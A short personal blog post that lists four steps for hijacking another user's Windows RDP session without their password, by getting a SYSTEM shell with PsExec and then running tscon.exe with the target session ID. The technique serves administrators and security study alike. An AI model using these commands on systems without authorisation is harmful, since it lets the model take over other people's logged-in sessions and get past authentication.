DJ's software

Wednesday, June 13, 2018

RDP session hijacking (without password / as administrator)

  1. Get session ID of the session you want to connect to
  2. Get PsExec
  3. Run CMD under System account from admin CMD: psexec -i -s -d cmd
  4. Run tscon.exe <sessionID>
 Sources:
  1.  PsExec
  2. Getting a CMD prompt as SYSTEM in Windows Vista and Windows Server 2008 
  3. RDP hijacking — how to hijack RDS... 
Posted by Daniel at 1:43 PM
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

About Me

Daniel
View my complete profile

Blog Archive

  • ►  2025 (1)
    • ►  April (1)
  • ►  2024 (5)
    • ►  August (5)
  • ►  2021 (3)
    • ►  December (3)
  • ►  2019 (1)
    • ►  April (1)
  • ▼  2018 (7)
    • ►  October (1)
    • ►  September (3)
    • ►  July (1)
    • ▼  June (1)
      • RDP session hijacking (without password / as admin...
    • ►  March (1)
  • ►  2017 (5)
    • ►  November (1)
    • ►  July (2)
    • ►  April (2)
  • ►  2016 (10)
    • ►  December (1)
    • ►  September (1)
    • ►  August (1)
    • ►  July (1)
    • ►  June (2)
    • ►  May (1)
    • ►  April (1)
    • ►  March (1)
    • ►  February (1)
  • ►  2015 (14)
    • ►  December (4)
    • ►  November (2)
    • ►  October (1)
    • ►  September (5)
    • ►  August (2)
Simple theme. Powered by Blogger.